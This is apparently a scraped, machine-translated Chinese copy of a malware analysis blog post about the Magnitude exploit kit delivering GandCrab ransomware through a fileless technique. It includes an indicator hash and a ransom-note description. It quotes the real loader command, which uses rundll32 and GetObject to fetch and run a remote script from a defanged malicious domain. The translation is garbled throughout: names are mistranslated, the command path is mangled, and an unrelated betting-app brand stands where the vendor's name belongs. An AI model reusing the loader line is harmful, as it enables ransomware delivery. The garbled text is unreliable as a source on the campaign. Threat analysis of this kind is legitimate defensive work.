GandCrab勒索软件正在通过malspam,社会工程方案, 和利用工具运动。4月16日,我们发现了巨大的ek,这忠于自己的胶铁ransomware现在正借助杠杆将其推出GandCrab, 也。
虽然幅度ek仍然集中在朝鲜目标上,但我们能够通过重放先前录制的感染捕获来感染英语版的窗户。这是一个有趣的偏离Magniber,在避开其他地点方面做得非常彻底。
量级现在也使用一种无文件技术来加载勒索软件的有效载荷,这使得拦截和检测有点困难。这种技术的变化有几年前就知道了并被其他家族使用,如Poweliks,但他们是一个新的增加到量级。
图1:用GandCrab负载捕获的EK量级流量
该公司一直在尝试用非常规的方式加载恶意软件,例如通过二进制填充,或最近通过另一种技术,但仍然从流量或网络数据包捕获中“清楚地”暴露它。
图2:2018年4月4日的幅度ek滴胶
有效负载被编码(使用VBScript.Encode/JScript.Encode)并嵌入到脚本中,随后在内存中解码并执行。
“C: \ Windows \ System32系统\ rundll32.exe”javascript:“\ . .\ [RunHTMLApplication”;document . write (); GetObject('脚本:http://dx30z30a4t11l7be.lieslow[,]信仰/ 5 aad4b91a0da20d4faab0991bdbe7138”)
图3:无害的脚本隐藏了有效负载
在有效载荷被注入之后资源管理器,它会立即尝试重新启动计算机。如果我们暂停这个程序,使用@hasherezade的PE-Sieve,我们实际上可以从内存中转储GandCrab DLL:
图4:使用PE-Sieve从内存中提取有效载荷
一旦成功感染病毒,文件将被. crab扩展名加密,同时会留下一封勒索信,说明恢复这些文件所需的下一步步骤。
图5:Gandcrab的赎金券
最近的一次执法行动为受害者提供了从以前的GandCrab感染中恢复文件的方法。但是,最新版本目前无法解密。
必威平台APP当Internet Explorer (CVE-2016-0189)或Flash Player (CVE-2018-4878)漏洞被攻击时,用户将受到保护。
时间会证明星等是否会坚持GandCrab,但这是一个值得注意的变化,因为在替换了值得信任的Cerber后,它只使用自己的Magniber勒索软件大约7个月。
妥协的指标
倾倒GandCrab DLL
9 daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a
评论